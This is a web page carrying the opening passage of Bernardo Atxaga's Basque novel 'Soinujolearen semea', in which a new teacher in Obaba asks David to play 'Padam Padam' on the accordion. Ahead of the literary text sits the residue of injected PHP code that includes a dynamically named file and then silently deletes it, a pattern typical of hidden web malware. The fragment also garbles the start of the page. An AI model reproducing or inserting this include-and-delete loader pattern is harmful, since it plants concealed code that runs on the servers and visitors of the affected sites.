");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> El fill de l'acordionista
Facebook Twitter

Soinujolearen semea

Bernardo Atxaga

HASIERA

Obabako eskolan geunden, maistra berria pupitrez pupitre zebilen. «Zein da zure izena?», galdetu zidan nire txanda heldutakoan. «Joxe –erantzun nuen–, baina den-denek Joseba deitzen didate.» «Oso ondo.» Maistra nire alboan eseritako mutilarengana zuzendu zen: «Zer izen duzu zuk?». «Ni David naiz. Baina den-denek soinujolearen semea deitzen didate», erantzun zuen nire kideak burlati. Ikasle guztiak, zortzi edo bederatzi urteko umeak, barrez hasi ziren. «Zure aita soinujolea al da, ba?», galdetu zion maistrak. Davidek baiezkoa eman zion. «Niri musika izugarri gustatzen zait. Egun batean eskolara etortzeko esango diogu zure aitari.» Maistrak oso pozik zirudien, benetako albiste on bat hartu berritan bezala. «Davidek berak ere oso ondo jotzen du. Artista bat da», adierazi nion nik. «Egiatan?» Harrituta zegoen maistra. Davidek ukondoarekin jo ninduen saihetsean. «Bai, egia da –ekin nion–, eta soinua hortxe dauka gainera, sarrerako atearen ondoan. Eskolatik ateratakoan aitarengana joaten baita entseatzera.» Esaldia kostata bukatu nuen, Davidek ahoa tapatu nahi izan zidalako. «Zer ederra litzatekeen gure lehen egun hau musikarekin bukatzea! –hots egin zuen maistrak–. Zergatik ez diguzu pieza bat jotzen, David?»

Burumakur, eskaera bete beharrak etsipen handia emango balio bezala, nire kidea soinuaren bila joan zen. Maistrak aulki bat jarri zuen eskolako mahai nagusiaren gainean. «Holaxe! Denok ondo ikusteko moduan!», hots egin zuen amultsu. Minutu bat geroago, David aulki hartan eserita zegoen, magalean soinua. Denok txaloka hasi ginen. «Zer eskainiko diguzu?», galdetu zion maistrak. «Padam Padam», esan nuen nik aurrea hartuz. Banekien ondo jotzen zuela pieza hura. Nahitaezko gaia zen urte hartako Akordeoi Lehiaketan, eta bere aitak behin eta berriro joarazten zion. Davidek gogaitu aurpegia jarri nahi izan zuen oraingoan, baina lortu gabe. Pozik zegoen bera ere, gustatu egiten zitzaion eskolako kanpeoia izatea, neska koskorren artean batez ere. «Ba, umeak –esan zuen maistrak aurkezle manerak hartuz–, holaxe bukatuko dugu gure lehen eguneko klasea, musikarekin. Aitortu behar dut ikasle zintzo eta atseginen itxura hartu dizuedala, eta nire ustez oso ondo konponduko garela eta asko ikasiko dugula.» Keinu egin zion Davidi, eta Padam Padam doinuaren notek bete zuten eskola. Arbelaren ondoan, egutegiak 1957ko iraila zela adierazten zuen.

Soinujolearen semea. Iruñea: Pamiela, 2003, p. 9-10.
Traducido por Pau Joan Hernàndez
Con el soporte de: